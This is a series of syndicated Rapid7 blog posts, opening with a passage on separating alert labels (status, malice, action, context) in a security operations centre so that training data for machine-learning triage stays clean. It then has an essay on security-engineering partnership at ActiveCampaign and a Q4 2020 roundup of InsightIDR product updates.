However, after a month or so, some of your stakeholders say they don’t want any more Potentially Unwanted Program (PUP) reports. They are using some of the slick Application Programming Interface (API) integrations of your reporting portal, and every time you publish a report, it creates a ticket and a ton of work on their end. “Stop sending us these PUP reports!” they beg. So, of course you agree to stop—but the problem is that with ARRoW, if you mark an alert Malicious, a report is automatically generated, so you have to mark them Benign to avoid that. Except they’re not Benign.

Now your PUP signatures look bad even though they aren’t! Your PUP classification model, intended to automatically separate true PUP alerts from False Positives, is now missing actual Malicious activity (which, remember, all your other customers still want to know about) because it has been trained on bad labels. All this because you wanted to streamline reporting! Before you know it, you are writing individual development tickets to add customer-specific expectations to ARRoW. You even build a “Customer Exception Dashboard” to keep track of them all. But you’re only digging yourself deeper.

Talkin’ SMAC: Alert Labeling and Why It Matters

Applying multiple labels

The solution to this problem is to answer separate questions with separate answers. Applying a single label to an alert is insufficient to answer the multiple questions SOC stakeholders want to know:

  1. Has it been reviewed? (Status)
  2. Is it indicative of malicious activity? (Malice)
  3. Do I need to do something? (Action)
  4. What else do we know about the alert? (Context)

These questions should be answered separately in different categories, and that separation must be enforced. Some categories can be open-ended, while others must remain limited multiple choice.

Let me explain:

Status: The choices here should include default options like OPEN, CLOSED, REPORTED, ESCALATED, etc. but there should be an ability to add new status labels depending on an organization’s workflow. This power should probably be held by management, to ensure new labels are in line with desired workflows and metrics. Setting a label here should be mandatory to move forward with alert analysis.

Malice: This category is arguably the most important one, and should ideally be limited to two options total: Malicious or Benign. To clarify, I use Benign here to denote an activity that reflects normal usage of computing resources, but not for usage that is otherwise malicious in nature but has been mitigated or blocked. Moreover, Benign does not apply to activities that are intended to imitate malicious behavior, such as red teaming or testing. Put most simply, “Benign” activities are those that reflect normal user and administrative usage.

Note: If an org chooses to include a third label such as “Suspicious,” rest assured that this label will eventually be abused, perhaps in situations of circumstantial ambiguity, or as a placeholder for custom workflows. Adding any choices beyond Malicious or Benign will add noise to this dataset and reduce its usefulness. And take note—this reduction in utility is not linear. Even at very low levels of noise, the dataset will become functionally worthless. Properly implemented, analysts must choose between only Malicious or Benign, and entering a label here should be mandatory to move forward. If caveats apply, they can be added in a comments section, but all measures should be taken before polluting the label space.

Action: This is where you can record information that answers the question “Should I do something about this?” This can include options like “Active Compromise,” “Ignore,” “Informational,” “Quarantined,” or “Sinkholed.” Managers and administrators can add labels here as needed, and choosing a label should be mandatory to move forward. These labels need not be mutually exclusive, meaning you can choose more than one.

Context: This category can be used as a catch-all to record any information that you haven’t already captured, such as attribution, suspected malware family, whether or not it was testing or a red-team, etc. This is often also referred to as “tagging.” This category should be the most open to adding new labels, with some care taken to normalize labels so as to avoid things like ‘APT29’ vs. ‘apt29’, etc. This category need not be mandatory, and the labels should not be mutually exclusive.

Note: Because the Context category is the most flexible, there are potentials for abuse here. SOC leadership should regularly audit newly created Context labels and ensure workarounds are not being built to circumvent meaningful labeling in the previous categories.

Garbage in, garbage out

Supervised SOC models are like new analysts—they will “learn” from what other analysts have historically done. In a very simplified sense, when a model is “trained” on alert data, it looks at each alert, looks at the corresponding label, and tries to draw connections as to why that label was applied. However, unlike human analysts, supervised SOC models can’t ask follow-on contextual questions like, “Hey, why did you mark this as Benign?” or “Why are some of these marked ‘Red Team’ and others are marked ‘Testing?’” The machine learning (ML) model can only learn from the labels it is given. Talkin’ SMAC: Alert Labeling and Why It MattersIf the labels are wrong, the model will be wrong. Therefore, taking time to really think through how and why we label our data a certain way can have ramifications months and years later. If we label alerts properly, we can measure—and therefore improve—our operations, threat intel, and customer impact more successfully.

I also recognize that anyone in user interface (UI) design may be cringing at this idea. More buttons and more clicks in an already busy interface? Indeed, I have had these conversations when trying to implement systems like this. However, the long-term benefits of having statistically meaningful data outweighs the cost of adding another label or three. Separating categories in this way also makes the alerting workflow a much richer target for automated rules engines and automations. Because of the multiple categories, automatic alert-handling rules need not be all-or-nothing, but can be more specifically tailored to more complex combinations of labels.

Why should we care about this?

Imagine a world when SOC analysts don’t have to waste time reviewing obvious false positives, or repetitive commodity malware. Imagine a world where SOC analysts only tackle the interesting questions—new types of evil, targeted activity, and active compromises.

Imagine a world where stakeholders get more timely and actionable alerts, rather than monthly rollups and the occasional after-action report when alerts are missed due to capacity issues.

Imagine centralized ML models learning directly from labels applied in customer SOCs. Knowledge about malicious behavior detected in one customer environment could instantaneously improve alert classification models for all customers.

SOC analysts with time to do deeper investigations, more hunting, and more training to keep up with new threats. Stakeholders with more value and less noise. Threat information instantaneously incorporated into real-time ML detection models. How do we get there?

The first step is building meaningful, useful alert datasets. Using a labeling scheme like the one described above will help improve fidelity and integrity in SOC alert labels, and pave the way for these innovations.

Talkin’ SMAC: Alert Labeling and Why It Matters

Finding Results at the Intersection of Security and Engineering

Post Syndicated from Chaim Mazal original https://blog.rapid7.com/2021/01/25/finding-results-at-the-intersection-of-security-and-engineering/

Finding Results at the Intersection of Security and Engineering

As vice president and head of global security at ActiveCampaign, I’m fortunate to be able to draw on a multitude of experiences and successes in my career. I started in general network security, where I was involved in pen testing and security research. I worked at several multibillion-dollar SaaS organizations—including three of the largest startups in Chicago—building out end-to-end application security programs, secure software-development lifecycles, and comprehensive security platforms.

From a solution-focused standpoint, I’ve learned that collaborating with teams to build a security culture is way more effective than simply identifying and assigning tasks.

Our “team up” approach

At ActiveCampaign, security is a full-fledged member of the technology organization. We adopt an engineering-first approach, eschewing traditional “just-throw-it-over-the-wall” actions. So, we certainly consider ourselves to be more than simply an advisory or compliance team. I’m proud of the fact that we roll up our sleeves and are right there with other parts of the tech organization, leading innovation and helping maintain compliance and deployment. The earlier you can build security into the process, the better (and the more money you’ll eventually save). We never want DevOps to feel like they need to complete tasks in a vacuum—instead, we’re partners.  

This extends to how we secure and deploy our cloud-based fleet. We don’t feel that we need to constantly maintain assets—rather, we look at them holistically and integrate solutions across the quarter. To achieve this view, we rely on Rapid7 solutions like InsightIDR dashboards. They help us to see whether anything has gone outside of our established parameters, serving as a continuous validation that procedures within our cloud-based policies are working without variance. They act as a last line of defense, if you will. So, when alerts for cloud-based tools do come in, security teams can draft project plans to help alleviate risk, create guardrails to deploy assets across environments, and then partner up to get it all done. This is an untraditional approach, but one where we’ve seen a ton of success in strengthening partnerships across the organization.

What we’ve achieved

During my time at ActiveCampaign, our approach has yielded what I believe are strong results and achievements. In this industry, we all have similar challenges, so it demands tailored solutions. There’s risk in convincing stakeholders to continually integrate new processes in the hope that it will all pay off at some future date. But this team believed in that work. So, here are just a few of our successes:

  • The security team has ramped up to a hands-on role in the development of templates, solutions, and real-time cloud-based policy. This has helped to enable our DevOps and engineering orgs to take a more efficient, security-first approach.
  • We now have the ability to execute one-click deployments across 90% of our fleet through automations and managed instances.
  • You can’t fix what you don’t have visibility into, so we put in the effort to get to a place where we have full uniform deployments of logging and security tooling across our fleet.
  • For greater transparency, we created parity across different asset types. This meant developing multiple classifications as well as asset-based safeguards and controls. From there, we had a clearer understanding of organizational limitations that enabled us to collaborate efficiently across teams to resolve issues.
  • We can take steps to get to a future state, even if something doesn’t work today. As such, we’ve become extremely flexible at developing stop-gap measures while simultaneously working on long-term paths to upgrade or resolve issues.

Some key tips and takeaways

I don’t believe there is any one perfect path, and no doubt your path will be different than ours here at ActiveCampaign. In my view, it’s about leveraging teamwork and partnerships to achieve your DevSecOps goals. That being said, let’s discuss a few learnings that might be helpful.  

  • If you have to do something more than once, see if there is a way to automate that process going forward. Being more efficient doesn’t cost a thing.
  • Convincing stakeholders and potential partners that the security org is more than, well, a security org, can go a long way in gaining support from decision-makers beyond or above your teams. Security can be an engineering partner that helps to power profit and value.
  • Get to your future state by proactively creating project plans that add insight into or address current investment limitations on your security team(s).
  • When it comes to partnering, there is also the other side of the proverbial coin. And that is not to assume everyone will have the same enthusiasm to work together across orgs. So, the takeaway here would be to communicate that DevSecOps is a shared responsibility, and not meant to be an inefficient detractor from a mission statement. In this way, everyone’s path to that shared responsibility will be different, but always remember that partnering—especially earlier in the process—is meant to create efficiencies.

The future state

Security, in its ideal form, is something for which we’ll always strive. At ActiveCampaign, we try to continuously make strides toward that “engineering org” situation. Time and again with efforts to align security to the customer value, I’m happy to see stakeholders—from the C-suite to board members—ultimately start to see how customers benefit. Then, it gets easier to obtain additional support so that we can get to that future state of protection, production, and value.    

I love highlighting efforts like those of our security product-engineering team. They’re building authentication features like SSO and MFA into our platform, on behalf of customers. When we can translate more security initiatives into operational and customer value, I get excited about the future of our industry and what we can do to protect and accelerate the pace of business.

What’s New in InsightIDR: Q4 2020 in Review

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2020/12/18/whats-new-in-insightidr-q4-2020-in-review/

What’s New in InsightIDR: Q4 2020 in Review

Throughout the year, we’ve provided roundups of what’s new in InsightIDR, our cloud-based SIEM tool (see the H1 recap post, and our most recent Q3 2020 recap post). As we near the end of 2020, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR from Q4 2020.

Complete endpoint visibility with enhanced endpoint telemetry (EET)

With the addition of the enhanced endpoint telemetry (EET) add-on module, InsightIDR customers now have the ability to access all process start activity data (aka any events captured when an application, service, or other process starts on an endpoint) in InsightIDR’s log search. This data provides a full picture of endpoint activity, enabling customers to create custom detections, see the full scope of an attack, and effectively detect and respond to incidents. Read more about this new add-on in our blog here, and see our on-demand demo below.

Network Traffic Analysis: Insight Network Sensor for AWS now in general availability

In our last quarterly recap, we introduced our early access period for the Insight Network Sensor for AWS, and today we’re excited to announce its general availability. Now, all InsightIDR customers can deploy a network sensor on their AWS Virtual Private Cloud and configure it to communicate with InsightIDR. This new sensor generates the same data outputs as the existing Insight Network Sensor, and its ability to deploy in AWS cloud environments opens up a whole new way for customers to gain insight into what is happening within their cloud estates. For more details, check out the requirements here.

What’s New in InsightIDR: Q4 2020 in Review

New Attacker Behavior Analytics (ABA) threats

Our threat intelligence and detection engineering (TIDE) team and SOC experts are constantly updating our detections as they discover new threats. Most recently, our team added 86 new Attacker Behavior Analytics (ABA) threats within InsightIDR. Each of these threats is a collection of three rules looking for one of 38,535 specific Indicators of Compromise (IoCs) known to be associated with a malicious actor’s various aliases.  

In total, we have 258 new rules, or three for each type of threat. The new rule types for each threat are as follows:

  • Suspicious DNS Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Web Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Process – <Malicious Actor Name> Related Binary Executed

New InsightIDR detections for activity related to recent SolarWinds Orion attack: The Rapid7 Threat Detection & Response team has compared publicly available indicators against our existing detections, deployed new detections, and updated our existing detection rules as needed. We also published in-product queries so that customers can quickly determine whether activity related to the breaches has occurred within their environment. Rapid7 is closely monitoring the situation, and will continue to update our detections and guidance as more information becomes available. See our recent blog post for additional details.

Custom Parser editing

InsightIDR customers leveraging our Custom Parsing Tool can now edit fields in their pre-existing parsers. With this new addition, you can update the parser name, extract additional fields, and edit existing extracted fields. For detailed information on our Custom Parsing Tool capabilities, check out our help documentation here.

What’s New in InsightIDR: Q4 2020 in Review

Record user-driven and automated activity with Audit Logging

Available to all InsightIDR customers, our new Audit Logging service is now in Open Preview. Audit logging enables you to track user driven and automated activity in InsightIDR and across Rapid7’s Insight Platform, so you can investigate who did what, when. Audit Logging will also help you fulfill compliance requirements if these details are requested by an external auditor. Learn more about the Audit Logging Open Preview in our help docs here, and see step-by-step instructions for how to turn it on here.

What’s New in InsightIDR: Q4 2020 in Review

New event source integrations: Cybereason, Sophos Intercept X, and DivvyCloud by Rapid7

With our recent event source integrations with Cybereason and Sophos Intercept X, InsightIDR customers can spend less time jumping in and out of multiple endpoint protection tools and more time focusing on investigating and remediating attacks within InsightIDR.

  • Cybereason: Cybereason’s Endpoint Detection and Response (EDR) platform detects events that signal malicious operations (Malops), which can now be fed as an event source to InsightIDR. With this new integration, every time an alert fires in Cybereason, it will get relayed to InsightIDR. Read more in our recent blog post here.
  • Sophos Intercept X: Sophos Intercept X is an endpoint protection tool used to detect malware and viruses in your environment. InsightIDR features a Sophos Intercept X event source that you can configure to parse alert types as Virus Alert events. Check out our help documentation here.
  • DivvyCloud: This past spring, Rapid7 acquired DivvyCloud, a leader in Cloud Security Posture Management (CSPM) that provides real-time analysis and automated remediation for cloud and container technologies. Now, we’re excited to announce a custom log integration where cloud events from DivvyCloud can be sent to InsightIDR for analysis, investigations, reporting, and more. Check out our help documentation here.

Stay tuned for more!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.

Not an InsightIDR customer? Start a free trial today.

Get Started